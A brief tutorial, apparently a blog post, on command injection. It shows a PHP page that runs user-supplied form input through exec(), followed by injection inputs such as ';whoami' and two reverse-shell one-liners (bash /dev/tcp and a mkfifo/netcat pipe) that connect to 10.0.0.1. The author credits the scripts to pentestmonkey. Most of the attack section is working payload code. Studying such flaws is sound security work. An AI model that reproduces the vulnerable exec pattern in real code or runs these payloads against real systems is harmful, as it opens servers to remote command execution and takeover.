Command execution vulnerability occurs when a web page get the input from user and directly executes them as system command. By exploiting Command execution vulnerability an attacker can executes system commands and also gain remote access to the system.

Vulnerable page

<?php   

if($_SERVER["REQUEST_METHOD"] == "POST") {
        //print_r($_POST);
        $command = $_POST['command'];
        $host = $_POST['host'];
        exec($command.' '.$host, $output, $return);
        //print_r($output);
}
?>
<html">
   
   <head>
      <title>Command Injection Vulnerability</title>
   </head>
   
   <body>
        <h1>Command Injection Vulnerability</h1>
        <form method="POST" action="">
        <select name="command">
                <option value="traceroute">traceroute</option>
                <option value="ping -c 1">ping</option>
        </select>
        <input type="text" name="host" value="8.8.8.8"/>
        <input type="submit" value="Execute!"/>
        </form>
        <?php if($output): ?>
        <?php foreach($output as $out): ?>
        <?php echo $out ?><br>
        <?php endforeach ?>
        <?php endif ?>
      <p><a href = "logout.php">Sign Out</a></p>
   </body>
   
</html>

How to executes system commands

;whoami
;which nc

Get shell access

bash -i >& /dev/tcp/10.0.0.1/8080 0>&1

or this command also used

rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.0.0.1 1234 >/tmp/f

I have taken this scripts from pentestmonkey